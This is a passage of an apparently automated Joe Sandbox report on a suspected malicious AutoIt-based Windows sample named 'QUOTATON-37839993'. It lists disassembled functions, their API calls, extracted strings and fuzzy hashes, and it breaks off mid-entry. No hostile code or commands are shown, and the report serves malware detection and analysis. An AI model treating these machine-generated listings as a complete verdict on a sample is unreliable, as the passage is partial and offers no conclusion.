                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled
                                                                      • String ID:
                                                                      • API String ID: 3192549508-0
                                                                      • Opcode ID: a816f6458c704e89912322086d106a0f1de0611329d945dc8b2641fa7f358b06
                                                                      • Instruction ID: 5b5a46477a0c8aed7dd83651fecdb38cdd4e60e6bbb12e351a11ec94d01ae46b
                                                                      • Opcode Fuzzy Hash: a816f6458c704e89912322086d106a0f1de0611329d945dc8b2641fa7f358b06
                                                                      • Instruction Fuzzy Hash: F6A0113000020CAB8A002B82EC08888BFACEB022A0B008020F80C800228B32A8208A80
                                                                      Function 00E18808 Relevance: .6, Instructions: 590COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4697dc1a10e53e7a9c76c9d0a345a700404826ee80276c436332f34d32584511
                                                                      • Instruction ID: a4e6a69b5c457d9185a7a4dbfda4e8224b789346571964ffe565ea51ae9faf86
                                                                      • Opcode Fuzzy Hash: 4697dc1a10e53e7a9c76c9d0a345a700404826ee80276c436332f34d32584511
                                                                      • Instruction Fuzzy Hash: 0A224632904506CBCF288A64C6A47FD7BA1FF41309F28A96BD94ABB492DB34DCC5C741
                                                                      Function 00E221C5 Relevance: .3, Instructions: 345COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                      • Instruction ID: 08e1d2010b67edf68475b205a1f00dc25462f041d29830877cf7ccee6f5866c0
                                                                      • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                      • Instruction Fuzzy Hash: B0C1AA322451B34ADF2D4639E43403EFBA15EA27B631B27ADD4B3EB1D4EE10DA25D610
                                                                      Function 00E225FA Relevance: .3, Instructions: 341COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                      • Instruction ID: 8623e29c660fda2ebaeaaa50957f1f2c366dfc46035b6048000c667b12c12b4a
                                                                      • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                      • Instruction Fuzzy Hash: 21C176332051B349DF2D4639D43413EBAA15EE27B631B27ADD4B3EB1D4EE10CA25D620
                                                                      Function 00E21978 Relevance: .3, Instructions: 323COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                      • Instruction ID: 1bdb8a0fb873dcf9955506ab9e1c6c1b0e4b639d491438a5290225f776ba2c8f
                                                                      • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                      • Instruction Fuzzy Hash: 96C194362450B349DF2D4639A43413EFBA15EB27B631B27EDD4B2EB1C4EE20CA65D610
                                                                      Function 01050E88 Relevance: .1, Instructions: 92COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2184455170.000000000104D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_104d000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                      • Instruction ID: c591e5f25a6bdb9aee535db75a549ad1245ba244031223eea484f2979e9bd068
                                                                      • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                      • Instruction Fuzzy Hash: A341C271D1051CEBCF48CFADC991AAEBBF2AF88201F548299D516AB345D730AB41DB80
                                                                      Function 01050D18 Relevance: .0, Instructions: 35COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2184455170.000000000104D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_104d000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                      • Instruction ID: 784c5e0a4e8622725fdc1aae9d78a23342906bb09d5045893c57e2763722b3f3
                                                                      • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                      • Instruction Fuzzy Hash: 1F019278A00209EFCB98EF98C5909AEF7F5FB48310F208599EC59A7345D730AE41DB90
                                                                      Function 01050D78 Relevance: .0, Instructions: 35COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2184455170.000000000104D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_104d000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                      • Instruction ID: 4463b1076a71116b98a37f52086219ac94363df2e631b5b9f5de0f2d86f412cb
                                                                      • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                      • Instruction Fuzzy Hash: AA019278A00209EFCB84DF98C5909AEF7F5FB88310F208599EC59A7305D730AE41DB90
                                                                      Function 0104F708 Relevance: .0, Instructions: 6COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2184455170.000000000104D000.00000040.00000020.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_104d000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                      • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                      • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                      • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                      Function 00E77806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DeleteObject.GDI32(00000000), ref: 00E7785B
                                                                      • DeleteObject.GDI32(00000000), ref: 00E7786D
                                                                      • DestroyWindow.USER32 ref: 00E7787B
                                                                      • GetDesktopWindow.USER32 ref: 00E77895
                                                                      • GetWindowRect.USER32(00000000), ref: 00E7789C
                                                                      • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 00E779DD
                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 00E779ED
                                                                      • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E77A35
                                                                      • GetClientRect.USER32(00000000,?), ref: 00E77A41
                                                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00E77A7B
                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E77A9D
                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E77AB0
                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E77ABB
                                                                      • GlobalLock.KERNEL32(00000000), ref: 00E77AC4
                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E77AD3
                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00E77ADC
                                                                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E77AE3
                                                                      • GlobalFree.KERNEL32(00000000), ref: 00E77AEE
                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E77B00
                                                                      • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,00E92CAC,00000000), ref: 00E77B16
                                                                      • GlobalFree.KERNEL32(00000000), ref: 00E77B26
                                                                      • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00E77B4C
                                                                      • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00E77B6B
                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E77B8D
                                                                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00E77D7A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                                      • API String ID: 2211948467-2373415609
                                                                      • Opcode ID: 5747380bb9e105e214de42500bde879e0e03d67bf6510794d86a9b8aa77f3c76
                                                                      • Instruction ID: a62c75c033a8d97ca1d06d1316db26de84a26a5ced57e75ba1bc7d7d618fb963
                                                                      • Opcode Fuzzy Hash: 5747380bb9e105e214de42500bde879e0e03d67bf6510794d86a9b8aa77f3c76
                                                                      • Instruction Fuzzy Hash: BD027B71900215EFDB14DFA5DC89EAEBBB9EF48310F108168F959BB2A1C730AD45CB60
                                                                      Function 00E8356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CharUpperBuffW.USER32(?,?,00E8F910), ref: 00E83627
                                                                      • IsWindowVisible.USER32(?), ref: 00E8364B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharUpperVisibleWindow
                                                                      • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                      • API String ID: 4105515805-45149045
                                                                      • Opcode ID: 0f4776ff137c399310870b2e0b2104d6c014f5137e7e60cbc227cdcc2a030811
                                                                      • Instruction ID: 92defa382b990c27fb9a7adaba43cdaa157359235c0e85ae7f53456fbbe92106
                                                                      • Opcode Fuzzy Hash: 0f4776ff137c399310870b2e0b2104d6c014f5137e7e60cbc227cdcc2a030811
                                                                      • Instruction Fuzzy Hash: F8D16E702043019BCB04FF20C552AAE77E5AF95754F546868F88A7B3E3DB21EE4ACB51
                                                                      Function 00E8A5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetTextColor.GDI32(?,00000000), ref: 00E8A630
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 00E8A661
                                                                      • GetSysColor.USER32(0000000F), ref: 00E8A66D
                                                                      • SetBkColor.GDI32(?,000000FF), ref: 00E8A687
                                                                      • SelectObject.GDI32(?,00000000), ref: 00E8A696
                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 00E8A6C1
                                                                      • GetSysColor.USER32(00000010), ref: 00E8A6C9
                                                                      • CreateSolidBrush.GDI32(00000000), ref: 00E8A6D0
                                                                      • FrameRect.USER32(?,?,00000000), ref: 00E8A6DF
                                                                      • DeleteObject.GDI32(00000000), ref: 00E8A6E6
                                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 00E8A731
                                                                      • FillRect.USER32(?,?,00000000), ref: 00E8A763
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 00E8A78E
                                                                        • Part of subcall function 00E8A8CA: GetSysColor.USER32(00000012), ref: 00E8A903
                                                                        • Part of subcall function 00E8A8CA: SetTextColor.GDI32(?,?), ref: 00E8A907
                                                                        • Part of subcall function 00E8A8CA: GetSysColorBrush.USER32(0000000F), ref: 00E8A91D
                                                                        • Part of subcall function 00E8A8CA: GetSysColor.USER32(0000000F), ref: 00E8A928
                                                                        • Part of subcall function 00E8A8CA: GetSysColor.USER32(00000011), ref: 00E8A945
                                                                        • Part of subcall function 00E8A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 00E8A953
                                                                        • Part of subcall function 00E8A8CA: SelectObject.GDI32(?,00000000), ref: 00E8A964
                                                                        • Part of subcall function 00E8A8CA: SetBkColor.GDI32(?,00000000), ref: 00E8A96D
                                                                        • Part of subcall function 00E8A8CA: SelectObject.GDI32(?,?), ref: 00E8A97A
                                                                        • Part of subcall function 00E8A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 00E8A999
                                                                        • Part of subcall function 00E8A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 00E8A9B0
                                                                        • Part of subcall function 00E8A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 00E8A9C5
                                                                        • Part of subcall function 00E8A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 00E8A9ED
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                      • String ID:
                                                                      • API String ID: 3521893082-0
                                                                      • Opcode ID: d2abfc6a2cb0376f721fe65cd5d7cc46bae8e0d11a937379185e96d9a49e7f91
                                                                      • Instruction ID: 3bb08e8254bc433ca6a5f035f8322c1e0744d1fa8c8950b20a8ec2f3fb3062b1
                                                                      • Opcode Fuzzy Hash: d2abfc6a2cb0376f721fe65cd5d7cc46bae8e0d11a937379185e96d9a49e7f91
                                                                      • Instruction Fuzzy Hash: B5919F72008301FFDB10AF65DC08A5B7BA9FF88321F141B2AF56AB61A1D731D948DB52
                                                                      Function 00E774AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DestroyWindow.USER32(00000000), ref: 00E774DE
                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00E7759D
                                                                      • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 00E775DB
                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 00E775ED
                                                                      • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00E77633
                                                                      • GetClientRect.USER32(00000000,?), ref: 00E7763F
                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00E77683
                                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00E77692
                                                                      • GetStockObject.GDI32(00000011), ref: 00E776A2
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 00E776A6
                                                                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 00E776B6
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00E776BF
                                                                      • DeleteDC.GDI32(00000000), ref: 00E776C8
                                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00E776F4
                                                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 00E7770B
                                                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00E77746
                                                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00E7775A
                                                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 00E7776B
                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 00E7779B
                                                                      • GetStockObject.GDI32(00000011), ref: 00E777A6
                                                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00E777B1
                                                                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 00E777BB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                      • API String ID: 2910397461-517079104
                                                                      • Opcode ID: 163b8fb06e3fdf1f8fc0d09a785c64436da3d119ac19fc7f40907418f632af04
                                                                      • Instruction ID: 64dda31c5dce07395608681dac5b91639dd946f547d36137014bb2e2696c5e20
                                                                      • Opcode Fuzzy Hash: 163b8fb06e3fdf1f8fc0d09a785c64436da3d119ac19fc7f40907418f632af04
                                                                      • Instruction Fuzzy Hash: B2A16DB1A00605BFEB14DBA5DC4AFAE7BB9EB04710F008124FA19B72E1D771AD45CB64
                                                                      Function 00E6AD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00E6AD1E
                                                                      • GetDriveTypeW.KERNEL32(?,00E8FAC0,?,\\.\,00E8F910), ref: 00E6ADFB
                                                                      • SetErrorMode.KERNEL32(00000000,00E8FAC0,?,\\.\,00E8F910), ref: 00E6AF59
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$DriveType
                                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                      • API String ID: 2907320926-4222207086
                                                                      • Opcode ID: 8a68a380e1b85cee7f220065545915c3def7c3b1d0975f23c01fe0f9d3ca2475
                                                                      • Instruction ID: 54f1975fdb77e11e61e83a6967f315fa8eff7d0a0c69af648e5f347ac5988aab
                                                                      • Opcode Fuzzy Hash: 8a68a380e1b85cee7f220065545915c3def7c3b1d0975f23c01fe0f9d3ca2475
                                                                      • Instruction Fuzzy Hash: 825184B4B842059ACB50DB60EA82CFA73E5EF487847287076E416B7291DA319D41DF53
                                                                      Function 00E068DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.2183201708.0000000000E01000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E00000, based on PE: true
                                                                      • Associated: 00000000.00000002.2183173180.0000000000E00000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000E8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183323427.0000000000EB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183598249.0000000000EBE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.2183677957.0000000000EC7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_e00000_QUOTATON-37839993.jbxd
                                                                      Similarity
                                                                      • API ID: __wcsnicmp
                                                                      • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                      • API String ID: 1038674560-86951937
                                                                      • Opcode ID: 27f2ebd623859b180aad64ff5a750302e413f81637226a160d0ee44d01c8ddea
                                                                      • Instruction ID: 6c8426c0385496d4e5863415a60ed2e10edb346c15d1568101ccd29c91b77933
                                                                      • Opcode Fuzzy Hash: 27f2ebd623859b180aad64ff5a750302e413f81637226a160d0ee44d01c8ddea
                                                                      • Instruction Fuzzy Hash: 7C81F5B1700315BADF20BA60EC46FAF37A8AF15704F047025F905BA1D6EB70DEA5C6A1
                                                                      Function 00E89A1C Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
